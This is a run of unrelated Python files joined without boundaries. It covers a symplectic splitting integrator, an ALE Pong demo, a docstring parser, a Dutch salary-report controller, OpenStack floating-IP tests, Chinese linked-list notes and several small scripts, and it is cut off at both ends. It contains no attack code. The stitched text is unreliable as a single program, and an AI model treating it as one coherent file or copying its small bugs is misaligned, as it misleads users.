numpy import zeros __all__ = ["ProcessingSplittingParameters"] class ProcessingSplittingParameters(object): def build(self, method): r""" :param method: A string specifying the method for time integration. :return: Four arrays :math:`a`, :math:`b` and :math:`y`, :math:`z`. ====== ======= ================= ========= Method Order Authors Reference ====== ======= ================= ========= BCR764 (7,6,4) Blanes/Casas/Ros [1]_ table (iv) ====== ======= ================= ========= .. [1] <NAME>, <NAME>, and <NAME>, "Symplectic Integration with Processing: A General Study", SIAM Journal on Scientific Computing, Volume 21, Issue 2, (1999) 711-727. """ if method == "BCR764": # Kernel Pattern ABA # Exchanged a and b compared to the paper in # order to have consistency with other code a = zeros(4) a[0] = 0.0 a[1] = 1.5171479707207228 a[2] = -2.0342959414414454 a[3] = 1.5171479707207228 b = zeros(4) b[0] = 0.5600879810924619 b[1] = -0.06008798109246194 b[2] = -0.06008798109246194 b[3] = 0.5600879810924619 # Pre/Post-Processor z = zeros(6) z[0] = -0.3346222298730 z[1] = 1.097567990732164 z[2] = -1.038088746096783 z[3] = 0.6234776317921379 z[4] = -1.102753206303191 z[5] = -0.0141183222088869 y = zeros(6) y[0] = -1.621810118086801 y[1] = 0.0061709468110142 y[2] = 0.8348493592472594 y[3] = -0.0511253369989315 y[4] = 0.5633782670698199 y[5] = -0.5 else: raise NotImplementedError("Unknown method: " + method) return a, b, y, z def intprepsplit(self, psi1, psi2, a, b, y, z, tspan, N, args1=[], args2=[]): r""" Compute a single, full propagation step by processing operator splitting. :param psi1: First evolution operator :math:`\Psi_a` :param psi2: Second evolution operator :math:`\Psi_b` :param a: Parameters for evolution with operator :math:`\Psi_a` :param b: Parameters for evolution with operator :math:`\Psi_b` :param y: Parameters for evolution with processor :math:`\Pi_y` :param z: Parameters for evolution with processor :math:`\Pi_z` :param tspan: Timespan :math:`t` of a single, full splitting step :param N: Number of substeps to perform :param args1: Additional optional arguments of :math:`\Psi_a` :param args2: Additional optional arguments of :math:`\Psi_b` .. note:: The values for ``args1`` and ``args2`` have to be of type ``list`` even in case of single items. """ s = a.shape[0] p = y.shape[0] h = (tspan[1] - tspan[0]) / float(N) # Preprocessor for j in range(p): psi1(-z[j] * h, *args1) psi2(-y[j] * h, *args2) # Kernel for k in range(N): for j in range(s): psi1(a[j] * h, *args1) psi2(b[j] * h, *args2) # Postprocessor for j in range(p - 1, -1, -1): psi1(y[j] * h, *args1) psi2(z[j] * h, *args2) import math x = float(input('digite um nr: ')) print(f'o nr digitado é {x} e sua parte inteira é {math.trunc(x)}') #from math import trunc,sqrt #print(trunc(x) # # int(x) - também retorna somente a parte inteira de x<filename>example/python_example.py import sys from random import randrange from ale_python_interface import ALEInterface import pygame ale = ALEInterface() # Get & Set the desired settings ale.setInt('random_seed', 123) # Set USE_SDL to true to display the screen. ALE must be compilied # with SDL enabled for this to work. On OSX, pygame init is used to # proxy-call SDL_main. USE_SDL = True if USE_SDL: if sys.platform == 'darwin': pygame.init() ale.setBool('sound', False) # Sound doesn't work on OSX elif sys.platform.startswith('linux'): ale.setBool('sound', True) ale.setBool('display_screen', True) # Load the ROM file ale.loadROM('Pong.bin') # Get the list of legal actions legal_actions = ale.getMinimalActionSet() print legal_actions # Play 10 episodes for episode in xrange(10): total_reward = 0 while not ale.game_over(): if pygame.key.get_pressed()[pygame.K_RIGHT]: print 'right' elif pygame.key.get_pressed() == pygame.K_LEFT: print 'left' a = legal_actions[randrange(len(legal_actions))] # Apply an action and get the resulting reward reward = ale.act(a); print 'Reward acquired: ', reward total_reward += reward print 'Episode', episode, 'ended with score:', total_reward ale.reset_game() import torch def churn(pred_1, pred_2): """ Shows the disagreement between two model's prediction. Higher the churn, more the disagreement. Bounds: [0,1]. Takes to prediction arrays as inputs and retuns churn. """ assert torch.tensor(pred_1).shape == torch.tensor(pred_2).shape, "Size mismatch between pred_1 and pred_2" match = torch.unique((pred_1 == pred_2), return_counts=True) disagreement = match[1][match[0] == False] churn = disagreement / torch.numel(pred_1) return churn pred_1 = torch.randint(0, 100, (1000,)) pred_2 = torch.randint(0, 100, (1000,)) churn(pred_1, pred_2) <gh_stars>0 """ Modules """ # each module has a specific functionality and is a different file # 1. import command # game.py # import the draw module import draw def play_game(): pass def main(): result = play_game() draw.draw_game(result) # draw.py def draw_game(): pass def clear_screen(screen): pass # 2. from command # game.py # import the draw module from draw import draw_game def main(): result = play_game() draw_game(result) # 3. import * # game.py # import the draw module from draw import * def main(): result = play_game() draw_game(result) # 4. import as # game.py # import the draw module if visual_mode: # in visual mode, we draw using graphics import draw_visual as draw else: # in textual mode, we print out text import draw_textual as draw def main(): result = play_game() # this can either be visual or textual depending on visual_mode draw.draw_game(result) # 5. dir and help # Just show fiddling around with help and dir in the terminalimport re def normalize(text): if text is not None: return text.strip() return None def normalize_type(text): text = normalize(text) if text is None: text = "" if text.startswith('{'): text = text[1:] if text.endswith('}'): text = text[:-1] return text def process_name(text): if text is None: return None, False, None is_optional = text.startswith('[') default_value = None if not is_optional: return text, False, None regex = re.compile( '\[(?P<name>[A-Za-z.]+)(?P<eq>=)?(?P<value>.+)?\]', ) match = regex.search(text) name = normalize(match.group('name')) try: default_value = normalize(match.group('value')) except: pass return name, is_optional, normalize(default_value) def preprocess_line(target): target = target.replace('@params', '@param') target = target.replace('@returns', '@return') return target def parse(regex, target): match = regex.search(target) if match is None: print("Failed to match string: " + target) return None, None, None arg_name = None arg_type = normalize(match.group('type')) arg_desc = normalize(match.group('desc')) try: arg_name = normalize(match.group('name')) except: pass arg_type = normalize_type( arg_type, ) arg_types = list(map( str.strip, filter(None, arg_type.split('|')), )) arg_desc = arg_desc.capitalize() return arg_name, arg_types, arg_desc def process_returns(returns): if returns is None: return None regex = re.compile( '@return\s*(?P<type>{.+})\s*-\s*(?P<desc>.+)', ) arg_name, arg_types, arg_desc = parse( regex, returns, ) if arg_desc is None: return None return { 'name': arg_name, 'type': arg_types, 'desc': arg_desc, } def process_params(params): regex = re.compile( '@param\s*(?P<type>{.+})\s*(?P<name>.+)?\s*-\s*(?P<desc>.+)', ) for num, param in enumerate(params, start=1): arg_name, arg_types, arg_desc = parse( regex, param, ) arg_optional = False arg_default_value = None if arg_name is not None: arg_name, arg_optional, arg_default_value = process_name(arg_name) else: print(param) arg_name = "param" + str(num) if arg_types is not None: yield { 'name': arg_name, 'type': arg_types, 'desc': arg_desc, 'optional': arg_optional, 'default_value': arg_default_value } def transform_extract(extract): content, params, returns = [], [], None for line in extract.content: line = preprocess_line(line.strip()) if line.startswith('@param'): params.append(line) continue if line.startswith('@return'): returns = line continue if returns is not None: returns = f'{returns} {line}' continue if len(params) > 0: params[-1] = f'{params[-1]} {line}' continue if len(params) == 0: content.append(line) continue content = ' '.join(content) returns = process_returns(returns) params = list(process_params(params)) return { 'desc': content, 'params': params, 'returns': returns, } import web from web import form import model.ordergroup import model.regels from controller import Controller from functions import table_string class Salaris(Controller): def __init__(self): Controller.__init__(self) # subclass specific self.title = 'Salaris' self.module = 'salaris' self.webrender = web.template.render('webpages/salaris/') # Salaris specific: ordergroup_file = str(web.input(ordergroup='LION.1GS')['ordergroup']) self.year = int(web.input(year=2017)['year']) self.orders = model.ordergroup.load(ordergroup_file).list_orders_recursive().keys() # Forms dropdown_options = self.dropdown_options() self.form_settings_simple = form.Form( form.Dropdown('ordergroup', dropdown_options['ordergroups_all'], description='Order Group', value=ordergroup_file), form.Dropdown('year', dropdown_options['years'], value=self.year, class_="btn btn-default btn-sm"), form.Button('submit', value='salaris_settings') ) def authorized(self): return model.users.check_permission(['salaris']) def process_sub(self): regels = model.regels.load(table_names_load=['salaris_plan', 'salaris_geboekt', 'salaris_obligo'], orders_load=self.orders,years_load=[self.year]) data = self.create_data_structure(regels) report = {} report['settings'] = self.render_settings() report['summary'] = self.render_summary(data) report['body'] = self.render_body(data) report['javaScripts'] = self.webrender.salaris_javascripts( data['orders'].keys() + ['payrollnr_nomatch', 'payrollnr_nokosten', 'payrollnr_match']) self.body = self.webrender.salaris(report) """ Returns 'data' (dict) needed to build the webpage. Not we use the payrollnr as the key as they are unique per person while a single person might have multiple contracts and hence personeelsnummers. data-structure for total overview: data['totals'] = {'begroot/realisatie/obligo/resultaat' as decimal, ..} data-structure for view per payrollnr: data['payrollnrs'][<payrollnr>] = {'begroot/realisatie/obligo/resultaat' as decimal, 'naam' as string, 'realiatie-perc' as decimal, 'match' as Boolean that is True if begroot/realisatie could be coupled via payroll/persnr} data-structure for overview per order: data['orders'][<ordernummer>] = {'naam' as string, ..} data['orders'][<ordernummer>]['totals'] = {'begroot/realisatie/obligo/resultaat' as decimal'} data['orders'][<ordernummer>]['payrollnrs'][<payrollnr>] = {'match' as Boolean (True if begroot and realisatie/obligo on the correct order), 'begroot/realisatie/obligo/resultaat' as decimal, 'naam' as string, 'realiatie-perc' as decimal} data-structure for overview per tiepe (match/nomatch/nokosten): data['tiepe'][<tiepe>] = {'naam' as string, ..} data['tiepe'][<tiepe>]['totals'] = {'begroot/realisatie/obligo/resultaat' as decimal'} data['tiepe'][<tiepe>]['payrollnrs'][<payrollnr>] = {'match' as Boolean (True if begroot and realisatie/obligo on the correct order), 'begroot/realisatie/obligo/resultaat' as decimal, 'naam' as string, 'realiatie-perc' as decimal} """ def create_data_structure(self, regels): try: # not always are there obligo's around obligo = regels.split(['tiepe', 'personeelsnummer'])['salaris_obligo'] except: obligo = None regels_per_order = regels.split(['ordernummer']) payroll_map = self.payroll_map(obligo) last_periode = model.regels.last_periode() order_list = model.orders.load().split(['ordernummer']) data = {'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}, 'orders': {}, 'payrollnrs': {}, 'match': {'payrollnrs': {}, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}}, 'nomatch': {'payrollnrs': {}, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}}, 'nokosten': {'payrollnrs': {}, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}}} for order, regelList in regels_per_order.iteritems(): if order not in data['orders']: name = order_list[order].orders[0].ordernaam data['orders'][order] = {'naam': name, 'totals': {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0}, 'payrollnrs': {}} for regel in regelList.regels: match = False if regel.tiepe == 'salaris_geboekt' or regel.tiepe == 'salaris_plan': if regel.personeelsnummer in payroll_map: payrollnr = payroll_map[regel.personeelsnummer] match = True else: payrollnr = regel.personeelsnummer else: payrollnr = regel.payrollnummer if regel.tiepe == 'salaris_obligo' and regel.periode < last_periode: # only allow obligos that are yet to come continue # data - order - payroll if payrollnr not in data['orders'][order]['payrollnrs']: data['orders'][order]['payrollnrs'][payrollnr] = {'naam': regel.personeelsnaam, 'match': match, 'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0} data['orders'][order]['payrollnrs'][payrollnr]['match'] = match or data['orders'][order]['payrollnrs'][ payrollnr]['match'] # once it is true it should stay true data['orders'][order]['payrollnrs'][payrollnr][regel.tiepe] += regel.kosten data['orders'][order]['payrollnrs'][payrollnr]['resultaat'] = \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_plan'] - \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_geboekt'] - \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_obligo'] if data['orders'][order]['payrollnrs'][payrollnr]['salaris_plan'] > 0: data['orders'][order]['payrollnrs'][payrollnr]['resultaat_perc'] = \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_geboekt'] / \ data['orders'][order]['payrollnrs'][payrollnr]['salaris_plan'] else: data['orders'][order]['payrollnrs'][payrollnr]['resultaat_perc'] = 0 # data - order - totals data['orders'][order]['totals'][regel.tiepe] += regel.kosten data['orders'][order]['totals']['resultaat'] = data['orders'][order]['totals']['salaris_plan'] - \ data['orders'][order]['totals']['salaris_geboekt'] - \ data['orders'][order]['totals']['salaris_obligo'] # data - payroll if payrollnr not in data['payrollnrs']: data['payrollnrs'][payrollnr] = {'naam': regel.personeelsnaam, 'match': match, 'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0, 'orders': {}} data['payrollnrs'][payrollnr]['match'] = match or data['payrollnrs'][payrollnr][ 'match'] # once it is true it should stay true data['payrollnrs'][payrollnr][regel.tiepe] += regel.kosten data['payrollnrs'][payrollnr]['resultaat'] = data['payrollnrs'][payrollnr]['salaris_plan'] - \ data['payrollnrs'][payrollnr]['salaris_geboekt'] - \ data['payrollnrs'][payrollnr]['salaris_obligo'] if data['payrollnrs'][payrollnr]['salaris_plan'] > 0: data['payrollnrs'][payrollnr]['resultaat_perc'] = data['payrollnrs'][payrollnr]['salaris_geboekt'] / \ data['payrollnrs'][payrollnr]['salaris_plan'] else: data['payrollnrs'][payrollnr]['resultaat_perc'] = 0 if order not in data['payrollnrs'][payrollnr]['orders']: data['payrollnrs'][payrollnr]['orders'][order] = {'salaris_plan': 0, 'salaris_obligo': 0, 'salaris_geboekt': 0, 'resultaat': 0} data['payrollnrs'][payrollnr]['orders'][order][regel.tiepe] += regel.kosten data['payrollnrs'][payrollnr]['orders'][order]['resultaat'] = \ data['payrollnrs'][payrollnr]['orders'][order]['salaris_plan'] - \ data['payrollnrs'][payrollnr]['orders'][order]['salaris_obligo'] - \ data['payrollnrs'][payrollnr]['orders'][order]['salaris_geboekt'] # data - match/nomatch/nokosten - .. # We have to this this in sep. loop because we need the # plan/geboekt/obligo regels matched first. for payrollnr, row in data['payrollnrs'].iteritems(): if row['match']: tiepe = 'match' elif row['salaris_geboekt'] > 0 or row['salaris_obligo'] > 0: tiepe = 'nomatch' else: tiepe = 'nokosten' # data - match/nomatch/nokosten - payroll data[tiepe]['payrollnrs'][payrollnr] = row # data - match/nomatch/nokosten - totals # data - totals for kosten_tiepe in ['salaris_plan', 'salaris_geboekt', 'salaris_obligo', 'resultaat']: data[tiepe]['totals'][kosten_tiepe] += row[kosten_tiepe] data['totals'][kosten_tiepe] += row[kosten_tiepe] return data """ construct hash_map for payroll to personeelsnummers note that payroll nummers will always have 1 personeelsnummer while multiple personeelsnummers (contracts) may refer to a single payrollnumber """ def payroll_map(self, regels_obligo): payroll_map = {} # { 'persnr': payrollnummer } if regels_obligo: for persnr, regelList in regels_obligo.iteritems(): for regel in regelList.regels: if persnr not in payroll_map: payroll_map[persnr] = regel.payrollnummer else: if regel.payrollnummer != payroll_map[persnr]: print 'ERRROR, multiple payrollnumbers for a single personeelsnummer' print persnr print regel.payrollnummer exit() return payroll_map def render_body(self, data): order_tables = self.render_order_tables(data) tiepe_tables = self.render_tiepe_tables(data) return self.webrender.salaris_body(order_tables, tiepe_tables) def render_tiepe_tables(self, data): tiepe_tables = [] headers = {} headers['names'] = {'match': 'Begroot en kosten', 'nomatch': 'Niet begroot wel kosten', 'nokosten': 'Wel begroot geen kosten'} for tiepe in ['match', 'nomatch', 'nokosten']: table = [] headers[tiepe] = {} headers[tiepe]['id'] = 'payrollnr_' + tiepe headers[tiepe]['img'] = '../static/figs/dummy.png' headers[tiepe]['name'] = headers['names'][tiepe] headers[tiepe]['ordernaam'] = headers['names'][tiepe] headers[tiepe]['begroot'] = table_string(data[tiepe]['totals']['salaris_plan']) headers[tiepe]['geboekt'] = table_string(data[tiepe]['totals']['salaris_geboekt']) headers[tiepe]['obligo'] = table_string(data[tiepe]['totals']['salaris_obligo']) headers[tiepe]['resultaat'] = table_string(data[tiepe]['totals']['resultaat']) for payrollnr in data[tiepe]['payrollnrs'].keys(): item = data[tiepe]['payrollnrs'][payrollnr] row = {} row['naam'] = item['naam'] row['personeelsnummer'] = payrollnr row['begroot'] = table_string(item['salaris_plan']) row['geboekt'] = table_string(item['salaris_geboekt']) row['obligo'] = table_string(item['salaris_obligo']) row['resultaat'] = table_string(item['resultaat']) row['resultaat_perc'] = '%.f' % (item['resultaat_perc'] * 100) + '%' row['td_class'] = 'success' if item['match'] else 'danger' row['details'] = False row['orders'] = [] for order in item['orders']: row['details'] = True order_item = {'ordernummer': '%s - %s' % (data['orders'][order]['naam'], order)} for key in ['salaris_plan', 'salaris_obligo', 'salaris_geboekt', 'resultaat']: order_item[key] = table_string(item['orders'][order][key]) row['orders'].append(order_item) table.append(self.webrender.salaris_personeel_regel(row)) tiepe_tables.append(self.webrender.salaris_table_order(table, headers[tiepe], 'persoon')) return tiepe_tables def render_order_tables(self, data): order_tables = [] for order in data['orders'].keys(): header = {} header['id'] = order header['img'] = '../static/figs/dummy.png' header['name'] = data['orders'][order]['naam'] + ' - ' + str(order) header['ordernaam'] = data['orders'][order]['naam'] header['begroot'] = table_string(data['orders'][order]['totals']['salaris_plan']) header['geboekt'] = table_string(data['orders'][order]['totals']['salaris_geboekt']) header['obligo'] = table_string(data['orders'][order]['totals']['salaris_obligo']) header['resultaat'] = table_string(data['orders'][order]['totals']['resultaat']) table_items = [] for payrollnr in data['orders'][order]['payrollnrs'].keys(): item = data['orders'][order]['payrollnrs'][payrollnr] row = {} row['naam'] = item['naam'] row['personeelsnummer'] = payrollnr row['begroot'] = table_string(item['salaris_plan']) row['geboekt'] = table_string(item['salaris_geboekt']) row['obligo'] = table_string(item['salaris_obligo']) row['resultaat'] = table_string(item['resultaat']) row['resultaat_perc'] = '%.f' % (item['resultaat_perc'] * 100) + '%' row['td_class'] = 'success' if item['match'] else 'danger' row['details'] = False table_items.append(self.webrender.salaris_personeel_regel(row)) order_tables.append(self.webrender.salaris_table_order(table_items, header, 'order')) return order_tables def render_settings(self): form_settings = self.form_settings_simple return self.webrender.salaris_settings(form_settings) def render_summary(self, data): begroot = data['totals']['salaris_plan'] geboekt = data['totals']['salaris_geboekt'] obligo = data['totals']['salaris_obligo'] kosten = data['totals']['salaris_geboekt'] + data['totals']['salaris_obligo'] resultaat = data['totals']['resultaat'] html = {} html['begroot'] = table_string(begroot) html['geboekt'] = table_string(geboekt) html['obligo'] = table_string(obligo) html['resultaat'] = table_string(resultaat) html['totaalkosten'] = table_string(kosten) return self.webrender.salaris_summary(html) <filename>openstackclient/tests/functional/network/v2/test_floating_ip.py # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import json import random import uuid from openstackclient.tests.functional.network.v2 import common class FloatingIpTests(common.NetworkTests): """Functional tests for floating ip""" EXTERNAL_NETWORK_NAME = uuid.uuid4().hex EXTERNAL_SUBNET_NAME = uuid.uuid4().hex PRIVATE_NETWORK_NAME = uuid.uuid4().hex PRIVATE_SUBNET_NAME = uuid.uuid4().hex ROUTER = uuid.uuid4().hex PORT_NAME = uuid.uuid4().hex @classmethod def setUpClass(cls): common.NetworkTests.setUpClass() if cls.haz_network: # Create a network for the floating ip json_output = json.loads(cls.openstack( 'network create -f json ' + '--external ' + cls.EXTERNAL_NETWORK_NAME )) cls.external_network_id = json_output["id"] # Create a private network for the port json_output = json.loads(cls.openstack( 'network create -f json ' + cls.PRIVATE_NETWORK_NAME )) cls.private_network_id = json_output["id"] # Try random subnet range for subnet creating # Because we can not determine ahead of time what subnets are # already in use, possibly by another test running in parallel, # try 4 times for i in range(4): # Make a random subnet cls.external_subnet = ".".join(map( str, (random.randint(0, 223) for _ in range(3)) )) + ".0/26" cls.private_subnet = ".".join(map( str, (random.randint(0, 223) for _ in range(3)) )) + ".0/26" try: # Create a subnet for the network json_output = json.loads(cls.openstack( 'subnet create -f json ' + '--network ' + cls.EXTERNAL_NETWORK_NAME + ' ' + '--subnet-range ' + cls.external_subnet + ' ' + cls.EXTERNAL_SUBNET_NAME )) cls.external_subnet_id = json_output["id"] # Create a subnet for the private network json_output = json.loads(cls.openstack( 'subnet create -f json ' + '--network ' + cls.PRIVATE_NETWORK_NAME + ' ' + '--subnet-range ' + cls.private_subnet + ' ' + cls.PRIVATE_SUBNET_NAME )) cls.private_subnet_id = json_output["id"] except Exception: if (i == 3): # raise the exception at the last time raise pass else: # break and no longer retry if create sucessfully break @classmethod def tearDownClass(cls): if cls.haz_network: del_output = cls.openstack( 'subnet delete ' + cls.EXTERNAL_SUBNET_NAME + ' ' + cls.PRIVATE_SUBNET_NAME ) cls.assertOutput('', del_output) del_output = cls.openstack( 'network delete ' + cls.EXTERNAL_NETWORK_NAME + ' ' + cls.PRIVATE_NETWORK_NAME ) cls.assertOutput('', del_output) def setUp(self): super(FloatingIpTests, self).setUp() # Nothing in this class works with Nova Network if not self.haz_network: self.skipTest("No Network service present") # Verify setup self.assertIsNotNone(self.external_network_id) self.assertIsNotNone(self.private_network_id) self.assertIsNotNone(self.external_subnet_id) self.assertIsNotNone(self.private_subnet_id) def test_floating_ip_delete(self): """Test create, delete multiple""" json_output = json.loads(self.openstack( 'floating ip create -f json ' + '--description aaaa ' + self.EXTERNAL_NETWORK_NAME )) self.assertIsNotNone(json_output["id"]) ip1 = json_output["id"] self.assertEqual( 'aaaa', json_output["description"], ) json_output = json.loads(self.openstack( 'floating ip create -f json ' + '--description bbbb ' + self.EXTERNAL_NETWORK_NAME )) self.assertIsNotNone(json_output["id"]) ip2 = json_output["id"] self.assertEqual( 'bbbb', json_output["description"], ) # Clean up after ourselves del_output = self.openstack('floating ip delete ' + ip1 + ' ' + ip2) self.assertOutput('', del_output) self.assertIsNotNone(json_output["floating_network_id"]) def test_floating_ip_list(self): """Test create defaults, list filters, delete""" json_output = json.loads(self.openstack( 'floating ip create -f json ' + '--description aaaa ' + self.EXTERNAL_NETWORK_NAME )) self.assertIsNotNone(json_output["id"]) ip1 = json_output["id"] self.addCleanup(self.openstack, 'floating ip delete ' + ip1) self.assertEqual( 'aaaa', json_output["description"], ) self.assertIsNotNone(json_output["floating_network_id"]) fip1 = json_output["floating_ip_address"] json_output = json.loads(self.openstack( 'floating ip create -f json ' + '--description bbbb ' + self.EXTERNAL_NETWORK_NAME )) self.assertIsNotNone(json_output["id"]) ip2 = json_output["id"] self.addCleanup(self.openstack, 'floating ip delete ' + ip2) self.assertEqual( 'bbbb', json_output["description"], ) self.assertIsNotNone(json_output["floating_network_id"]) fip2 = json_output["floating_ip_address"] # Test list json_output = json.loads(self.openstack( 'floating ip list -f json' )) fip_map = { item.get('ID'): item.get('Floating IP Address') for item in json_output } # self.assertEqual(item_map, json_output) self.assertIn(ip1, fip_map.keys()) self.assertIn(ip2, fip_map.keys()) self.assertIn(fip1, fip_map.values()) self.assertIn(fip2, fip_map.values()) # Test list --long json_output = json.loads(self.openstack( 'floating ip list -f json ' + '--long' )) fip_map = { item.get('ID'): item.get('Floating IP Address') for item in json_output } self.assertIn(ip1, fip_map.keys()) self.assertIn(ip2, fip_map.keys()) self.assertIn(fip1, fip_map.values()) self.assertIn(fip2, fip_map.values()) desc_map = { item.get('ID'): item.get('Description') for item in json_output } self.assertIn('aaaa', desc_map.values()) self.assertIn('bbbb', desc_map.values()) # TODO(dtroyer): add more filter tests json_output = json.loads(self.openstack( 'floating ip show -f json ' + ip1 )) self.assertIsNotNone(json_output["id"]) self.assertEqual( ip1, json_output["id"], ) self.assertEqual( 'aaaa', json_output["description"], ) self.assertIsNotNone(json_output["floating_network_id"]) self.assertEqual( fip1, json_output["floating_ip_address"], ) def test_floating_ip_set_and_unset_port(self): """Test Floating IP Set and Unset port""" json_output = json.loads(self.openstack( 'floating ip create -f json ' + '--description aaaa ' + self.EXTERNAL_NETWORK_NAME )) self.assertIsNotNone(json_output["id"]) ip1 = json_output["id"] self.addCleanup(self.openstack, 'floating ip delete ' + ip1) self.assertEqual( 'aaaa', json_output["description"], ) json_output = json.loads(self.openstack( 'port create -f json ' + '--network ' + self.PRIVATE_NETWORK_NAME + ' ' + '--fixed-ip subnet=' + self.PRIVATE_SUBNET_NAME + ' ' + self.PORT_NAME )) self.assertIsNotNone(json_output["id"]) port_id = json_output["id"] json_output = json.loads(self.openstack( 'router create -f json ' + self.ROUTER )) self.assertIsNotNone(json_output["id"]) self.addCleanup(self.openstack, 'router delete ' + self.ROUTER) self.openstack( 'router add port ' + self.ROUTER + ' ' + port_id ) self.openstack( 'router set ' + '--external-gateway ' + self.EXTERNAL_NETWORK_NAME + ' ' + self.ROUTER ) self.addCleanup( self.openstack, 'router unset --external-gateway ' + self.ROUTER, ) self.addCleanup( self.openstack, 'router remove port ' + self.ROUTER + ' ' + port_id, ) self.openstack( 'floating ip set ' + '--port ' + port_id + ' ' + ip1 ) self.addCleanup( self.openstack, 'floating ip unset --port ' + ip1, ) json_output = json.loads(self.openstack( 'floating ip show -f json ' + ip1 )) self.assertEqual( port_id, json_output["port_id"], ) ''' 线性表:0个或多个数据元素的有序序列 线性表的顺序存储结构: 用一段地址连续的存储单元依次存储线性表的数据元素 插入删除时间复杂度:O(n) 线性表的链式存储结构: 使用节点Node存储数据,节点包含数据域和指针域 插入删除时间复杂度O(1) 循环链表: 将最后一个元素的next指针指向head 双向链表: 添加prior指针指向上一节点 出入顺序:s.prior = p; s.next = p.next; p.next.prior = s; p.next = s ''' ''' 栈:仅在表尾进行插入和删除操作的线性表 栈的顺序存储结构: 两栈共享空间:两个栈共享一个数组,一个在头一个在尾,两栈互补关系 栈的链式储存结构: 中缀表达式转后缀表达式: 从左到右遍历中缀表达式的每个数字和符号,若是数字就输出,即成为后 缀表达式的一部分。若是符号,则判断其与栈顶符号的优先级,是右括号或优先 级低于栈顶符号(乘除优先加减)则将顶元素依次出钱并输出,并将当前符号进栈, 一直到最终输出后缀表达式为止。 后缀表达式计算: 从左到右遍历后缀表达式,遇到数字就进栈,遇到符号就将栈顶两个数字出栈并将 计算结果入栈,直到运算结束 ''' ''' 队列:只允许在一端进行插入操作,而在另一端进行删除操作的线性表 循环队列:头尾相接的顺序存储结构 front指向队列头,rear指向队列尾(队尾不存储数据) 队列空则 front==rear 队列满则 (rear+1)%QueueSize==front 队列长度 (rear-front+QueueSize)%QueueSize QueueSize包含不存储数据的位置 ''' class Node(): def __init__(self, data, next=None): self.data = data self.next = next class LinkedList(): ''' 单链表实现方法 ''' def __init__(self, head:Node=Node(-1)): self.__head = head def isempty(self): return self.__head.next == None def addelement(self, value): ''' 末尾添加元素 ''' p = self.__head q = Node(value) while p.next!=None: p = p.next p.next = q q.next = None # if p.next == None: # p.next = elem # elem.next = None # else: # q = p.next # elem.next = q # p.next = elem def showlist(self) -> list: ''' 返回list ''' p = self.__head result = [] if p.next == None: return result else: while p.next != None: q = p.next result.append(q.data) p = q return result def getelement(self, index:int) -> int or str: ''' 获取index处value值 ''' p = self.__head.next j = 1 while p!=None and j<index : p = p.next j += 1 if p==None or j>index: return 'error' return p.data def insertelement(self, value, index:int) -> str: ''' index 前插入 ''' p = self.__head node = Node(value) j = 1 while p.next!=None and j<index: p = p.next j += 1 if p.next==None or j>index: return 'error' else: q = p.next node.next = q p.next = node return 'OK' def deletenode(self, index:int) -> int or str: p = self.__head j = 1 while p!=None and j<index: p = p.next j += 1 if p.next==None or j>index: return 'error' else: q = p.next p.next = q.next return q.data if __name__ == '__main__': lista = LinkedList() print(lista.isempty()) lista.addelement(1) lista.addelement(2) # lista.addelement(c) print(lista.showlist()) print(lista.insertelement(3,1)) print(lista.getelement(3)) print(lista.showlist()) print(lista.deletenode(2)) print(lista.showlist()) <filename>reveries/maya/tools/avalonideditor/commands.py from maya import cmds def remove_id_edit(node): # (NOTE) No need to unload reference in prior def remove_edit(attr): cmds.referenceEdit(attr, failedEdits=True, successfulEdits=True, editCommand="setAttr", removeEdits=True) remove_edit(node + ".AvalonID") remove_edit(node + ".verifier") def list_id_edit(reference_node): edits = cmds.referenceQuery(reference_node, editNodes=True, editAttrs=True, editCommand="setAttr") id_edits = set() for edit in edits: if edit.endswith(".AvalonID") or edit.endswith(".verifier"): id_edits.add(edit) return id_edits <filename>compare.py #python example to infer document vectors from trained doc2vec model import gensim.models as g import codecs import sys import os import scipy.spatial.distance NOISY = not os.environ.get("QUIET",False) if len(sys.argv) != 3: if NOISY: print("Error") print("Please provide two files as arguments") sys.exit() def clean(t): return t.read().strip().split() def infer(t): return m.infer_vector(clean(t), alpha=start_alpha, steps=infer_epoch) #parameters model = "apnews_data/doc2vec.bin" #inference hyper-parameters start_alpha = 0.01 infer_epoch = 1000 #load model m = g.Doc2Vec.load(model) v1 = infer(open(sys.argv[1])) if NOISY: print("Vector for {} = {}".format(sys.argv[1], v1)) v2 = infer(open(sys.argv[2])) if NOISY: print("Vector for {} = {}".format(sys.argv[2], v2)) d = scipy.spatial.distance.cosine(v1,v2) if NOISY: print("Distance between documents {}".format(d)) else: print(d) import math from collections import deque, defaultdict n = int(raw_input()) m = int(raw_input()) graph = defaultdict(list) visited = {} while m > 0: line = raw_input().split() p, q = int(line[0]), int(line[1]) graph[p].append(q) graph[q].append(p) m -= 1 def bfs(g, start): visited[start] = True q = deque([start]) group_len = 0 while q: node = q.popleft() group_len += 1 for neighbour in g[node]: if not visited.get(neighbour, False): visited[neighbour] = True q.append(neighbour) return group_len total_cost = 0 for key in graph.keys(): if key not in visited: group_len = bfs(graph, key) total_cost += math.ceil(math.sqrt(group_len)) n -= group_len total_cost += n print int(total_cost) #https://stackoverflow.com/a/7071358/7530778 __version__ = "0.1.0rc2" s = __version__.find("rc") __version_info__ = tuple(map(int, __version__[:s].split('.'))) """ Otsu's binarization algorithm """ # Import required packages: import cv2 from matplotlib import pyplot as plt def show_img_with_matplotlib(color_img, title, pos): """Shows an image using matplotlib capabilities""" # Convert BGR image to RGB 